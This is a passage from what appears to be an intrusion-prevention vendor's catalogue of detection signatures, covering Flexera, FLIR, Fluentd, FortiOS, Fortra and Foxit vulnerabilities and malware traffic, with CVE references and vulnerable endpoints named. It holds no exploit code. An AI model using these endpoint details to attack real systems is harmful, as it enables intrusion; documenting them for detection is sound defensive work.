Description:

Improper bounds checking in a custom strncpy() function in Flexera Flexnet results in a heap buffer overflow vulnerability, which, when successfully exploited, can allow an attacker to execute arbitrary code with SYSTEM privileges.

Situation:

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow-2

References:

CVE-2015-8277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8277

Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF

About this vulnerability:

A vulnerability in Flexera FlexNet license server managers

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Flexera FlexNet

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been discovered in the FlexNet Publisher lmgrd license server manager. The vulnerability is due to insufficient bounds checking when handling requests received over the network. The server listens on port 27000/TCP by default. An attacker could leverage this vulnerability by sending a specially crafted request to the vulnerable service. Successful exploitation would allow execution of arbitrary code in the security context of the service. If an exploitation attempt fails, the server may terminate abnormally.

Situation:

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF

References:

BID-52718
http://www.securityfocus.com/bid/52718

Flexera-InstallShield-ISGrid2.dll-DoFindReplace-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Flexera AdminStudio

Risk:

Moderate

First detected in:

sgpkg-ips-424-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Flexera AdminStudio; Flexera InstallShield; Novell ZENworks Configuration Management; Novell ZENworks AdminStudio

Type:

Buffer Overflow

Description:

Two heap buffer overflow vulnerabilities exist in Flexera Software InstallShield. Specifically, these vulnerabilities exist in the InstallShield Grid Control, ISGrid2.dll. The vulnerabilities are due to insufficient validation of the arguments of the DoFindReplace() method. Crafted long arguments can cause an overflow of heap buffers that could possibly lead to injection and execution of arbitrary code. A remote unauthenticated attacker can exploit these vulnerabilities by enticing a target user to open a malicious HTML page that uses the ActiveX Control ISGrid.Grid2. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Text_Flexera-InstallShield-ISGrid2.dll-Heap-Buffer-Overflow

References:

CVE-2011-3174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3174

BID-50274
http://www.securityfocus.com/bid/50274

Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution

About this vulnerability:	A vulnerability in multiple products using Flexera ActiveX components
Risk:	Moderate
First detected in:	sgpkg-ips-479-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Flexera InstallShield; Novell ZENworks AdminStudio; Flexera AdminStudio
Type:	Buffer Overflow
Description:	There is a heap buffer overflow vulnerability in AdminStudio and InstallShield. Specifically, the vulnerability is due to insufficient validation by the DoFindReplace() function inside ISGrid.dll. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.
Situation:	File-Text_Flexera-Multiple-Products-Isgrid.dll-ActiveX-Control-Code-Execution

Flip4Mac-WMV-File-Parsing-Memory-Corruption

About this vulnerability:

Memory Corruption vulnerability in Flip4Mac library for Apple Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Apple QuickTime

Type:

Insecure Configuration

Description:

There is a memory corrution vulnerability in Flip4Mac library for Apple Quicktime. Specially crafted WMF file may cause memory corruption in a target computer.

Situation:

File-Binary_Telestream-Flip4Mac-WMV-File-Parsing-Memory-Corruption

References:

CVE-2007-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0466

BID-22286
http://www.securityfocus.com/bid/22286

OSVDB-32697
http://www.osvdb.org/32697

FLIR-AX8-Unauthenticated-RCE

About this vulnerability:

A vulnerability in FLIR AX8 cameras.

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Linux; Unix

Software:

FLIR

Type:

Input Validation

Description:

A vulnerability in FLIR AX8 thermal sensor cameras, versions 1.46.16 and before, which allow remote attackers to execute arbitrary code via the id parameter in an HTTP POST to res.php.

Situation:

HTTP_CRL-FLIR-AX8-Unauthenticated-RCE

References:

CVE-2022-37061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37061

Floodnet-IRC-Activity

About this vulnerability:	Floodnet IRC Activity
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Floodnet is a IRC controlled bot.
Situation:	Generic_SS-Floodnet-IRC-Activity

Fluent-Bit-Memory-Corruption-CVE-2024-4323

About this vulnerability:

A vulnerability in Fluent Bit

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

Fluent Bit

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in Fluent Bit versions 2.0.7 through 3.0.3. The vulnerability is due to insufficient validation of user-supplied input to the /api/v1/traces endpoint. Successful exploitation may lead to denial of service conditions, information disclosure, or remote code execution.

Situation:

HTTP_CRL-Fluent-Bit-Memory-Corruption-CVE-2024-4323

References:

CVE-2024-4323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4323

Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379

About this vulnerability:

A vulnerability in Fluentd parser

Risk:

High

First detected in:

sgpkg-ips-1538-5242

Last changed:

sgpkg-ips-1538-5242

Platform:

Generic

Software:

Fluentd

Type:

Input Validation

Description:

Fluentd collects events from various data sources and writes them to files, RDBMS, NoSQL, IaaS, SaaS, Hadoop and so on. An insecure deserialization vulnerability in non-default configurations of Fluentd has been reported, which allows unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.

Situation:

File-Text_Fluentd-Oj-Parser-Insecure-Deserialization-CVE-2022-39379

References:

CVE-2022-39379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39379

FoggyWeb-Backdoor-C2-Traffic

About this vulnerability:	FoggyWeb command and control traffic detected
Risk:	High
First detected in:	sgpkg-ips-1391-5242
Last changed:	sgpkg-ips-1391-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	FoggyWeb aims to exfiltrate information from compromised Active Directory Federation Services servers and may also download additional malicious components.
Situation:	HTTP_CSU-FoggyWeb-Backdoor-C2-Traffic

Forcepoint-SSLVPN-Password-Brute-Force

About this vulnerability:	An attempt to perform password brute-force in Forcepoint VPN detected
Risk:	High
First detected in:	sgpkg-ips-1829-5242
Last changed:	sgpkg-ips-1829-5242
Platform:	Generic
Software:	Forcepoint VPN
Type:	Failed Login
Description:	This detects password brute-force or spray attacks against Forcepoint VPN. Such attacks could result in credential disclosure or denial-of-service.
Situation:	Generic_SS-Forcepoint-SSLVPN-Authentication-Failure

Foreign-Botnet

About this vulnerability:	Foreign botnet
Risk:	High
First detected in:	sgpkg-ips-654-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Foreign is a malicious botnet that is primarily used to distribute and download further malicious modules. The deployment of these downloaded modules takes place without the user's consent. Among other malicious functionality, Foreign is known to record key strokes. As such, users of infected PCs should consider credentials for online services (such as social networks, web mailers, banks, etc.) compromised and change passwords after the threat has been removed.
Situation:	HTTP_CRL_Foreign-Botnet-Traffic HTTP_CSH-Foreign-Botnet-Traffic

Foreman-Bookmarks-Creation-Remote-Code-Injection

About this vulnerability:

A vulnerability in Foreman server licecycle management

Risk:

Moderate

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Foreman

Type:

Code Injection

Description:

The bookmark creation function in some versions of Foreman server lifecycle management tool allows an authenticated attacker to inject and execute malicious code in the target system.

Situation:

HTTP_CS-Foreman-Bookmarks-Creation-Remote-Code-Injection

References:

CVE-2013-2121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2121

OSVDB-94671
http://www.osvdb.org/94671

ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization

About this vulnerability:

A vulnerability in ForgeRock Access Management

Risk:

Moderate

First detected in:

sgpkg-ips-1372-5242

Last changed:

sgpkg-ips-1372-5242

Platform:

Generic

Software:

ForgeRock OpenAM

Type:

Input Validation

Description:

Improper input validation by the Jato framework causes an insecure deserialization vulnerability in ForgeRock Access Management. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization

References:

CVE-2021-35464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464

ForgeRock-OpenAM-Jato-Java-Deserialization

About this vulnerability:

A vulnerability in ForgeRock OpenAM.

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Unix; Linux

Software:

ForgeRock OpenAM

Type:

Input Validation

Description:

A vulnerability in ForgeRock OpenAM, versions before 7.0 running Java 8, which allows remote attackers to execute arbitrary code through the ccversion endpoint, due to a serialization flaw in OpenAM's implementation of the Jato framework.

Situation:

HTTP_CSU-ForgeRock-OpenAM-Jato-Java-Deserialization

References:

CVE-2021-35464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464

Form-Pointed-To-Localhost

About this vulnerability:	A HTML form with action argument pointing to localhost
Risk:	Moderate
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	HTML form action pointing to localhost can indicate a malicious website trying to access resources hosted on the browsing computer. Common targets may be e.g. development databases hosted on development computers.
Situation:	File-Text_HTML-Form-Pointed-To-Localhost

Formbook-Malware-Infection-Traffic

About this vulnerability:	Formbook malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1271-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Formbook malware infection traffic was detected.
Situation:	HTTP_CS-Formbook-Malware-Infection-Traffic

FortiGate-OS-Backdoor

About this vulnerability:

A backdoor in FortiGate OS

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FortiGate OS

Software:

<os>

Type:

Backdoor

Description:

There exists a backdoor in FortiGate OS.

Situation:

SSH_FortiGate-OS-Backdoor-Access-Attempt

References:

CVE-2016-1909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1909

FortiLogger-Arbitrary-File-Upload-Exploit

About this vulnerability:

A vulnerability in FortiLogger.

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Windows 10.0

Software:

FortiLogger

Type:

Input Validation

Description:

A vulnerability in FortiLogger, versions before 5.2.0, which allows remote attackers to execute arbitrary code by uploading files via an insecure POST request to /Config/SaveUploadedHotspotLogoFile, due to the insufficient validation of file type.

Situation:

HTTP_CS-FortiLogger-Arbitrary-File-Upload-Exploit

References:

CVE-2021-3378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3378

Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788

About this vulnerability:

A vulnerability in Fortinet FortiClientEMS

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1708-5242

Platform:

Generic

Software:

FortiClientEMS

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Fortinet FortiClientEMS. An unauthenticated attacker may use this vulnerability to execute arbitrary commands.

Situation:

Generic_CS-Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788

References:

CVE-2023-48788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48788

Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection

About this vulnerability:

A vulnerability in Fortinet FortiManager

Risk:

Moderate

First detected in:

sgpkg-ips-1806-5242

Last changed:

sgpkg-ips-1806-5242

Platform:

Generic

Software:

Fortinet FortiManager

Type:

Malfunction

Description:

The lack of access control when handling client requests causes a command injection vulnerability in Fortinet FortiManager. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

Generic_CS-Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection

References:

CVE-2024-47575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47575

Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952

About this vulnerability:

A vulnerability in Fortinet FortiNAC

Risk:

High

First detected in:

sgpkg-ips-1559-5242

Last changed:

sgpkg-ips-1559-5242

Platform:

Generic

Software:

Fortinet FortiNAC

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in Fortinet FortiNAC. A successful exploit can allow an unauthenticated attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952

References:

CVE-2022-39952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39952

Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591

About this vulnerability:

A vulnerability in Fortinet FortiOS

Risk:

High

First detected in:

sgpkg-ips-1830-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

FortiOS

Software:

<os>

Type:

Malfunction

Description:

An authentication bypass vulnerability in FortiOS and FortiProxy allows a remote attacker to gain super-admin privileges.

Situation:

HTTP_CSH-Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591

References:

CVE-2024-55591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55591

Fortinet-FortiOS-Authorization-Bypass

About this vulnerability:

A vulnerability in Fortinet FortiOS

Risk:

High

First detected in:

sgpkg-ips-1185-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

FortiGate OS

Software:

<os>

Type:

Malfunction

Description:

There exists an authorization bypass vulnerability in Fortinet FortiOS. Successful exploitation may allow an unauthenticated attacker to change password of an SSL VPN user.

Situation:

HTTP_CRL-Fortinet-FortiOS-Authorization-Bypass

References:

CVE-2018-13382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382

Fortinet-FortiOS-Format-String-CVE-2024-23113

About this vulnerability:

A vulnerability in Fortinet FortiOS

Risk:

High

First detected in:

sgpkg-ips-1815-5242

Last changed:

sgpkg-ips-1815-5242

Platform:

FortiOS

Software:

<os>

Type:

Format String

Description:

A format string vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiSwitchManager allows an unauthenticated attacker to execute arbitrary commands.

Situation:

Generic_CS-Fortinet-FortiOS-Format-String-CVE-2024-23113

References:

CVE-2024-23113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23113

Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383

About this vulnerability:

An attempt to exploit a vulnerability in FortiOS

Risk:

Moderate

First detected in:

sgpkg-ips-1426-5242

Last changed:

sgpkg-ips-1426-5242

Platform:

FortiOS

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Fortinet FortiOS.

Situation:

File-Text_Fortinet-FortiOS-Heap-Buffer-Overflow-CVE-2018-13383

References:

CVE-2018-13383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383

Fortinet-FortiOS-Out-Of-Bound-Write-CVE-2024-21762

About this vulnerability:

An attempt to exploit a vulnerability in FortiOS detected

Risk:

High

First detected in:

sgpkg-ips-1821-5242

Last changed:

sgpkg-ips-1821-5242

Platform:

FortiOS

Software:

<os>

Type:

Input Validation

Description:

A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests.

Situation:

HTTP_CCH-Maliciously-Large-Chunk-Size

References:

CVE-2024-21762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21762

Fortinet-FortiOS-Path-Traversal-CVE-2018-13379

About this vulnerability:

A vulnerability in Fortinet FortiOS

Risk:

High

First detected in:

sgpkg-ips-1304-5242

Last changed:

sgpkg-ips-1304-5242

Platform:

FortiOS

Software:

<os>

Type:

Input Validation

Description:

There exists a path traversal vulnerability in Fortinet FortiOS. Successful exploitation may allow an unauthenticated attacker to download arbitrary system files, for example SSL VPN credentials, via crafted HTTP requests.

Situation:

HTTP_CRL-Fortinet-FortiOS-Path-Traversal-CVE-2018-13379

References:

CVE-2018-13379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379

Fortinet-Fortisiem-Command-Injection-CVE-2023-34992

About this vulnerability:

A vulnerability in Fortinet FortiSIEM

Risk:

High

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

Fortinet FortiSIEM

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in Fortinet FortiSIEM. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary commands via crafted API requests.

Situation:

Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2023-34992

References:

CVE-2023-34992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34992

Fortinet-Fortisiem-Command-Injection-CVE-2024-23108

About this vulnerability:

A vulnerability in Fortinet FortiSIEM

Risk:

High

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

Fortinet FortiSIEM

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in Fortinet FortiSIEM. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary commands via crafted API requests.

Situation:

Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2024-23108

References:

CVE-2024-23108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23108

Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567

About this vulnerability:

A vulnerability in Fortinet FortiWeb

Risk:

Moderate

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Fortinet FortiWeb

Type:

Input Validation

Description:

Insufficient validation of user input in the cgi_grpc_idl_file_post function causes a command execution vulnerability in Fortinet FortiWeb. A successful exploitation allows an attacker to execute arbitrary commands on the target system with root privileges.

Situation:

HTTP_CS-Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567

References:

CVE-2024-50567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50567

Fortinet-Fortiweb-OS-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Fortinet FortiWeb OS detected

Risk:

High

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

FortiOS

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Fortinet FortiWeb OS detected.

Situation:

HTTP_CRL-Fortinet-Fortiweb-OS-Command-Injection

References:

CVE-2021-22123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22123

Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324

About this vulnerability:

A vulnerability in Fortinet FortiOS

Risk:

Moderate

First detected in:

sgpkg-ips-1868-5242

Last changed:

sgpkg-ips-1870-5242

Platform:

Generic

Software:

Fortinet FortiOS

Type:

Format String

Description:

Improper handling of certificate imports causes a vulnerability in multiple Fortinet products. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
HTTP_CRL-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324

References:

CVE-2024-45324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45324

Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884

About this vulnerability:

A vulnerability in Fortinet FortiManager

Risk:

Moderate

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Fortinet FortiManager

Type:

Input Validation

Description:

Insufficient validation of security fabric hello packets in the csfd component causes a directory traversal vulnerability in multiple Fortinet products. A successful exploitation allows an attacker to delete arbitrary files on the target system and cause a denial of service condition.

Situation:

Generic_CS-Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884

References:

CVE-2024-48884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48884

Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service

About this vulnerability:

A vulnerability in Fortinet Single Sign On

Risk:

High

First detected in:

sgpkg-ips-640-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Fortinet Single Sign On

Type:

Integer Overflow

Description:

A denial of service vulnerability exists in Fortinet Single Sign On (FSSO). The vulnerability is due to an integer overflow when calculating an address based on the size of a HELLO message. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HELLO message to collectoragent.exe. Successful exploitation could lead to a denial of service condition.

Situation:

Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service

References:

CVE-2015-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2281

BID-73206
http://www.securityfocus.com/bid/73206

OSVDB-119719
http://www.osvdb.org/119719

Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Fortinet Single Sign On (FSSO)

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Fortinet Single Sign On

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Fortinet Single Sign On (FSSO). The vulnerability is due to a lack of adequate validation of user-supplied input when processing HELLO messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted HELLO message to collectoragent.exe. Successful exploitation could lead to arbitrary code execution under the security context of the system user.

Situation:

Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow

References:

CVE-2015-2281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2281

BID-73206
http://www.securityfocus.com/bid/73206

OSVDB-119719
http://www.osvdb.org/119719

FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997

About this vulnerability:

An attempt to exploit a vulnerability in FortiOS detected

Risk:

High

First detected in:

sgpkg-ips-1601-5242

Last changed:

sgpkg-ips-1601-5242

Platform:

FortiOS

Software:

<os>

Type:

Heap Overflow

Description:

A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.

Situation:

HTTP_CRL-FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997

References:

CVE-2023-27997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27997

FortiOS-Authentication-Bypass-CVE-2022-40684

About this vulnerability:

A vulnerability in FortiOS

Risk:

High

First detected in:

sgpkg-ips-1514-5242

Last changed:

sgpkg-ips-1514-5242

Platform:

FortiOS

Software:

<os>

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in FortiOS, FortiProxy, and FortiSwitchManager.

Situation:

HTTP_CSH-FortiOS-Authentication-Bypass-CVE-2022-40684

References:

CVE-2022-40684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684

FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475

About this vulnerability:

An attempt to exploit a vulnerability in FortiOS detected

Risk:

High

First detected in:

sgpkg-ips-1568-5242

Last changed:

sgpkg-ips-1568-5242

Platform:

Generic

Software:

FortiOS

Type:

Heap Overflow

Description:

Multiple versions of Fortinet FortiOS SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute arbitrary code or commands via specifically crafted requests.

Situation:

HTTP_CSH_FortiOS-Ssl-VPN-Heap-Buffer-Overflow-CVE-2022-42475

References:

CVE-2022-42475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42475

Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633

About this vulnerability:

A vulnerability in Fortra FileCatalyst Workflow

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Fortra FileCatalyst Workflow

Type:

Insecure Configuration

Description:

Fortra FileCatalyst Workflow 5.1.6 build 139 and earlier contain publicly disclosed default HSQL database credentials. If a vulnerable version of the FileCatalyst Workflow hasn't been configured to use an alternative database, unauthenticated remote attackers can use these default credentials to access the HSQL database.

Situation:

Generic_CS-Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633

References:

CVE-2024-6633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6633

Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276

About this vulnerability:

An attempt to exploit a vulnerability in Fortra FileCatalyst detected

Risk:

High

First detected in:

sgpkg-ips-1745-5242

Last changed:

sgpkg-ips-1745-5242

Platform:

Generic

Software:

Fortra FileCatalyst Workflow

Type:

Input Validation

Description:

A SQL injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. The likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Situation:

HTTP_CRL-Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276

References:

CVE-2024-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5276

Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856

About this vulnerability:

An attempt to exploit a vulnerability in Four-Faith router detected

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

Four-Faith Router

Type:

Input Validation

Description:

The Four-Faith router models F3x24 and F3x36 are affected by an operating system (OS) command injection vulnerability. At least firmware version 2.0 allows authenticated and remote attackers to execute arbitrary OS commands over HTTP when modifying the system time via "apply.cgi". Additionally, this firmware version has default credentials which, if not changed, would effectively change this vulnerability into an unauthenticated and remote OS command execution issue.

Situation:

HTTP_CRL-Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856

References:

CVE-2024-12856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12856

Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Foxit Software Enterprise Reader
Risk:	Moderate
First detected in:	sgpkg-ips-669-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Foxit Reader
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability exists in Foxit Reader. The vulnerability exists in ConvertToPDF_x86.dll and is due to improper bound checking on tEXt chunk when converting a PNG file to PDF file. A remote unauthenticated attacker can leverage this to overflow a buffer. Successful exploitation would result in execution of arbitrary code in the security context of the target user.
Situation:	File-PNG_Foxit-Multiple-Products-PNG-To-PDF-Conversion-Heap-Buffer-Overflow

Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Editor

Risk:

Moderate

First detected in:

sgpkg-ips-1402-5242

Last changed:

sgpkg-ips-1402-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-CVE-2021-34850-Use-After-Free

References:

CVE-2021-34850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34850

Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Editor

Risk:

Moderate

First detected in:

sgpkg-ips-1402-5242

Last changed:

sgpkg-ips-1402-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Rect-Use-After-Free

References:

CVE-2021-34842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34842

Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Editor

Risk:

Moderate

First detected in:

sgpkg-ips-1397-5242

Last changed:

sgpkg-ips-1397-5242

Platform:

Generic

Software:

Foxit Reader

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Foxit PDF Reader and Editor. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Foxit-PDF-Reader-And-Editor-Annotation-Richdefaults-Use-After-Free

References:

CVE-2021-34848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34848

Foxit-PDF-Reader-And-Editor-Annotation-Rotate-Use-After-Free

About this vulnerability:

A vulnerability in Foxit Software PDF Editor

Risk:

Moderate

